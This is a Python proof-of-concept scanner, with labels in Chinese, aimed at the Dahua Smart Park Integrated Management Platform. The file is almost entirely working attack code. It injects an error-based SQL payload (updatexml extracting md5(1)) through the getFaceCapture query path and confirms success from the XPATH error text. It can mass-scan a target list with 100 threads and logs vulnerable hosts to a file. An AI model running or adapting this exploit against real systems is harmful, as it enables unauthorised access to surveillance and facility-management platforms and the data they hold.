import requests,sys,argparse,urllib3,re
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    test = """███████  ██████  ██      
██      ██    ██ ██      
███████ ██    ██ ██      
     ██ ██ ▄▄ ██ ██      
███████  ██████  ███████ 
            ▀▀           version 1.0.0
                         

"""
    print(test)

def main():
    banner()
    parser = argparse.ArgumentParser('大华智慧园区综合管理平台')
    parser.add_argument('-u','--url',dest='url',type=str,help='link')
    parser.add_argument('-f','--file',dest='file',type=str,help='file')
    args = parser.parse_args()
    if args.url:
        poc(args.url)
    elif args.file:
        url_list = []
        with open(args.file,'r',encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    payload = '/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select+md5%281%29),0x7e),1)--%22%7D/extend/%7B%7D'
    headers = {
        'Accept-Encoding':'gzip, deflate, br',
        'Connection':'close'
    }
    try:
        res1 = requests.get(url=target+payload,headers=headers,verify=False,timeout=5)
        match = re.search(r"~(XPATH syntax error :'(.+?)')",res1.text,re.S)
        if match and '~c4ca4238a0b923820dcc509a6f75849' in match.group(1):
            print(f"[+]{target}   存在漏洞")
            with open('result.txt','a') as fp:
                fp.write(target+'\n')
        else:
            print(f"[-]{target}   不存在漏洞")
    except Exception as e:
                            print(f"[-]{target}  网站异常")
        

if __name__ == '__main__':
    main()
